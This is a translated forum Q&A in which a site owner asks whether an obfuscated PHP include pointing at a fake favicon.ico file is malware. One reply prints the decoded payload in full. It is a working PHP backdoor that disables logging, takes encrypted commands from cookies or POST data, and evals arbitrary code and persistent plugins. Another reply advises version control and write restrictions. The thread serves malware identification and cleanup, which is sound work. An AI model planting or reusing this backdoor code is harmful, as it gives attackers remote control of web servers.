A
A
Anton Dyrkov2018-03-10 14:49:56
PHP
Anton Dyrkov, 2018-03-10 14:49:56

Is it a virus code or not?

If you translate this code, then it refers to favicon.ico , but when disinfecting the site, I deleted such files (where God knows what is written) as viruses

<?php
/*72aa5*/

@include "\x2fv\x61r\x2fw\x77w\x2fv\x61r\x6ea\x76a\x5fv\x79k\x73a\x72f\x2fd\x61t\x61/\x77w\x77/\x78n\x2d-\x2d-\x37s\x62a\x61b\x68c\x636\x65y\x616\x61t\x32k\x2ex\x6e-\x2dp\x31a\x69/\x6ee\x74c\x61t\x2fm\x6fd\x75l\x65s\x2ff\x69l\x65m\x61n\x61g\x65r\x2ff\x61v\x69c\x6fn\x5f5\x652\x65f\x66.\x69c\x6f";

/*72aa5*/


echo file_get_contents('index.html.bak.bak');

Answer the question

In order to leave comments, you need to log in

2 answer(s)
R
Rsa97, 2018-03-10
@kavi4

And you open this .ico file in a text editor, the malware is sitting there.

If you decrypt it:
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);


if(!defined("PHP_EOL"))
{
    define("PHP_EOL", "\n");
}

if(!defined("DIRECTORY_SEPARATOR"))
{
    define("DIRECTORY_SEPARATOR", "/");
}

if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
    define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);

    $data = NULL;
    $data_key = NULL;

    $GLOBALS['cs_auth'] = '58d0af46-4572-4890-a372-475116d44415';
    global $cs_auth;


    function cs_base64_decode($input) {

        if (strlen($input) < 4)
        {
            return "";
        }

        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

        $keys = str_split($keyStr);
        $keys = array_flip($keys);

        $i = 0;
        $output = "";

        $input = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $input);

        do {
            $enc1 = $keys[$input[$i++]];
            $enc2 = $keys[$input[$i++]];
            $enc3 = $keys[$input[$i++]];
            $enc4 = $keys[$input[$i++]];

            $chr1 = ($enc1 << 2) | ($enc2 >> 4);
            $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
            $chr3 = (($enc3 & 3) << 6) | $enc4;
            $output = $output . chr($chr1);
            if ($enc3 != 64) {
                $output = $output . chr($chr2);
            }
            if ($enc4 != 64) {
                $output = $output . chr($chr3);
            }
        } while ($i < strlen($input));
        return $output;
    }

    if (!function_exists('file_put_contents'))
    {
        function file_put_contents($n, $d, $flag = False)
        {
            $mode = $flag == 8 ? 'a' : 'w';
            $f = @fopen($n, $mode);
            if ($f === False)
            {
                return 0;
            }
            else
            {
                if (is_array($d)) $d = implode($d);
                $bytes_written = fwrite($f, $d);
                fclose($f);
                return $bytes_written;
            }
        }
    }

    if (!function_exists('file_get_contents'))
    {
        function file_get_contents($filename)
        {
            $fhandle = fopen($filename, "r");
            $fcontents = fread($fhandle, filesize($filename));
            fclose($fhandle);

            return $fcontents;
        }
    }
    function cs_get_current_filepath()
    {
        return trim(preg_replace("/\(.*\$/", '', __FILE__));
    }

    function cs_decrypt_phase($data, $key)
    {
        $out_data = "";

        for ($i=0; $i<strlen($data);)
        {
            for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
            {
                $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
            }
        }

        return $out_data;
    }

    function cs_decrypt($data, $key)
    {
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
    }
    function cs_encrypt($data, $key)
    {
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
    }

    function cs_get_plugin_config()
    {
        $self_content = @file_get_contents(cs_get_current_filepath());

        $config_pos = strpos($self_content, md5(cs_get_current_filepath()));
        if ($config_pos !== FALSE)
        {
            $config = substr($self_content, $config_pos + 32);
            $plugins = @unserialize(cs_decrypt(rawurldecode($config), md5(cs_get_current_filepath())));
        }
        else
        {
            $plugins = Array();
        }

        return $plugins;
    }

    function cs_set_plugin_config($plugins)
    {
        $config_enc = rawurlencode(cs_encrypt(@serialize($plugins), md5(cs_get_current_filepath())));
        $self_content = @file_get_contents(cs_get_current_filepath());

        $config_pos = strpos($self_content, md5(cs_get_current_filepath()));
        if ($config_pos !== FALSE)
        {
            $config_old = substr($self_content, $config_pos + 32);
            $self_content = str_replace($config_old, $config_enc, $self_content);

        }
        else
        {
            $self_content = $self_content . "\n\n//" . md5(cs_get_current_filepath()) . $config_enc;
        }

        @file_put_contents(cs_get_current_filepath(), $self_content);
    }

    function cs_plugin_add($name, $base64_data)
    {
        $plugins = cs_get_plugin_config();

        $plugins[$name] = cs_base64_decode($base64_data);

        cs_set_plugin_config($plugins);
    }

    function cs_plugin_rem($name)
    {
        $plugins = cs_get_plugin_config();

        unset($plugins[$name]);

        cs_set_plugin_config($plugins);
    }

    function cs_plugin_load($name=NULL)
    {
        foreach (cs_get_plugin_config() as $pname=>$pcontent)
        {
            if ($name)
            {
                if (strcmp($name, $pname) == 0)
                {
                    eval($pcontent);
                    break;
                }
            }
            else
            {
                eval($pcontent);
            }
        }
    }

    foreach ($_COOKIE as $key=>$value)
    {
        $data = $value;
        $data_key = $key;
    }

    if (!$data)
    {
        foreach ($_POST as $key=>$value)
        {
            $data = $value;
            $data_key = $key;
        }
    }

    $data = @unserialize(cs_decrypt(cs_base64_decode($data), $data_key));

    if (isset($data['ak']) && $cs_auth==$data['ak'])
    {
        if ($data['a'] == 'i')
        {
            $i = Array(
                'pv' => @phpversion(),
                'sv' => '2.0-1',
                'ak' => $data['ak'],
            );
            echo @serialize($i);
            exit;
        }
        elseif ($data['a'] == 'e')
        {
            eval($data['d']);
        }
        elseif ($data['a'] == 'plugin')
        {
            if($data['sa'] == 'add')
            {
                cs_plugin_add($data['p'], $data['d']);
            }
            elseif($data['sa'] == 'rem')
            {
                cs_plugin_rem($data['p']);
            }
        }
        echo $data['ak'];
        exit();
    }

    cs_plugin_load();
}

And the comment line at the end of the code is the plugins that it loads.

L
Lazy @BojackHorseman PHP, 2018-03-10
Tag

omg! Yes, you will drive the source code of the site under the version control system and check and roll back all the left changes with one command!
and if you also forbid the web server to write to all folders except those allowed by you personally, then you will never ask such a stupid question at all

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question